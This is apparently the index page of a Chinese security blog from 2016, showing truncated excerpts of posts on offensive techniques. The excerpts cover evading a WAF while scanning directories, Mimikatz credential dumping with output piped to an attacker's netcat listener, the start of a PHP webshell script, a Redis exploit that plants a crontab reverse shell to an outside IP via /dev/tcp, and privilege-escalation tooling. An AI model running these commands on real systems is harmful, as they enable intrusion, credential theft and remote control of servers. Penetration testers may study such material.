扫目录过狗过waf方法

分类:安全 | 2016-12-8 | 撸过 32 次
1人扯谈

用御剑的朋友都遇到过这个页面吧,装狗了开启保护就会这样

本机搭建安全狗设置发现,默认是过蜘蛛的,所以只要把http头来路改成蜘蛛的useragent就ok了

无奈御剑和wscan 都是无法设置http头的,也无法用burp做代理中转改http头

像AWVS,Burp类大型扫描工具也可以进行目录扫描,并且也可以挂代理,改http头,不过个人感觉远没有专业扫描工具来的简单

因此翻出一款老工具

DirBuster是Owasp(开放Web软体安全项目- Open Web Application Security Project )开发的一款专门用于探测Web服务器[……]

继续阅读

PentestBox 一款Windows平台开源渗透测试

分类:安全 | 2016-12-6 | 撸过 61 次
0人扯谈

PentestBox是一款Windows平台下预配置的便携式开源渗透测试环境为什么又有一个渗透测试环境?

PentestBox不同于运行在虚拟机或者双启动环境的Linux渗透测试发行版。它打包了所有的安全工具,并且可以在Windows系统中原生地运行,有效地降低了对虚拟机或者双启动环境的需求。我们发现超过50%的渗透测试发行版是运行在Windows系统下的虚拟机程序中,这激发我们创造了它。

[ 源代码]

特性

易于使用

只是一个简单的命令行工具。group设计简洁

不同于传统的绿字黑色背景终端。flash_on性能卓越

直接运行在主机上而不依赖于虚拟机[……]

继续阅读

星外虚拟主机跨web目录文件读取技巧

分类:安全 | 2016-11-7 | 撸过 388 次
0人扯谈

星外虚拟主机跨目录读取文件漏洞,需要一定条件。

详细说明:

问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令:

c:\windows\7i24IISLOG.exe
 
c:\windows\7i24IISLOG2.exe
 
c:\windows\7i24IISLOG3.exe
 
c:\windows\7i24IISLOG4.exe
 
c:\windows\7i24tool.exe
 
c:\windows\rsb.exe

其中的7i24IISLOG.exe其实就是LogParser,LogParser是一[……]

继续阅读

Java反序列化利用工具 — Java Deserialization Exp Tools

分类:工具 | 2016-11-5 | 撸过 617 次
1人扯谈

Java反序列化漏洞已经被曝出一段时间了,本人参考了网上大神的放出来的工具,将Jboss、Websphere和weblogic的反序列化漏洞的利用集成到了一起。FreeBuf上已经公开了JBoss反序列化执行命令回显的工具,在本文中就不多做叙述了。其实,WebSphere的利用过程也和JBoss差不多,只不过在发送Payload和解析结果的时候多了个Base64编码(解码)的过程。
本工具暂时支持的功能:
1、本地命令执行并回显,无须加载外部jar包,支持纯内网环境检测。
2、支持JBoss、WebSphere和Weblogic的反序列化漏洞检测。
3、支持https数据传输。
4、[……]

继续阅读

Mimikatz 使用小技巧

分类:安全 | 2016-10-6 | 撸过 822 次
0人扯谈

1.记录 Mimikatz输出:

C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir

2.将输出导入到本地文件:

C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt

3.将输出传输到远程机器:
Attacker执行:

E:\>nc -lvp 4444

Victim执行:

C:\>mi[......]

继续阅读

当webshell不可执行cmshell时 (菜刀的安全模式!)可用此脚本突破执行cmd命令

分类:安全 | 2016-10-6 | 撸过 795 次
2人扯谈
<?php

/*
==============
*/

error_reporting(0);
ini_set('max_execution_time',0);


// ------------------------------------- Some header Functions (Need to be on top) ---------------------------------\

/**************** Defines *********************************/

$user = "anlfi";[......]

继续阅读

linux 提权 实战Linux下三种不同方式的提权技巧

分类:安全 | 2016-10-3 | 撸过 746 次
1人扯谈

介绍:

渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhub下载。

 

实验一:利用Linux内核漏洞提权

VulnOS version 2是VulHub上的一个Linux提权练习,当打开虚拟机后,可以看到
[……]

继续阅读

redis利用姿势收集

分类:安全 | 2016-09-25 | 撸过 433 次
0人扯谈

redis的exploit,完全不需要flushall破坏数据场景,redis-cli set 1 ‘ringzero’,这样可以控制第一条记录,就能保证你的内容始终保持在最前面;

测试环境:CentOS,RHEL

# 利用crontab反弹shell

redis-cli flushall 
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -x set 1 
redis-cli config set dir /var/spool/c[......]

继续阅读

Linux_Exploit_Suggester — Linux下提权辅助工具

分类:安全 | 2016-09-24 | 撸过 323 次
0人扯谈

Linux_Exploit_Suggester是一款根据操作系统版本号自动查找相应提权脚本的工具,如果不带任何参数运行该脚本的话,将执行uname -r返回的操作系统发行版本,或者手工输入-k参数查找指定版本号。

例子:

$ perl ./Linux_Exploit_Suggester.pl -k 3.0.0

Kernel local: 3.0.0

Possible Exploits:
[+] semtex
   CVE-2013-2094
   Source: www.exploit-db.com/download/25444/‎
[+] memodipper[......]

继续阅读

Windows-Exploit-Suggester — Windows下提权辅助工具

分类:安全 | 2016-09-24 | 撸过 547 次
0人扯谈

此工具是一款非常好用的Windows下提权辅助工具(已经支持Windows 10下的提权了),国内已经有许多人在用了,但是一直没有相应的中文文档,所以我特地翻译了一下,水平有限,如有错误,欢迎指出,谢谢。

描述

该工具可以将目标系统的补丁安装情况与微软的漏洞数据库进行对比,进而检测出目标系统中潜在的未修复漏洞。同时此工具还会告知用户针对于此漏洞是否有公开的exp和可用的Metasploit模块。

同时它可以使用–update参数去自动化地从微软下载漏洞补丁数据库,并将其以Excel表格的形式保存。

需要注意的是,此工具首先会假定目标系统存在所有漏洞,然后再基于系统补丁情[……]

继续阅读

第 1 页,共 69 页12345...102030...最旧 »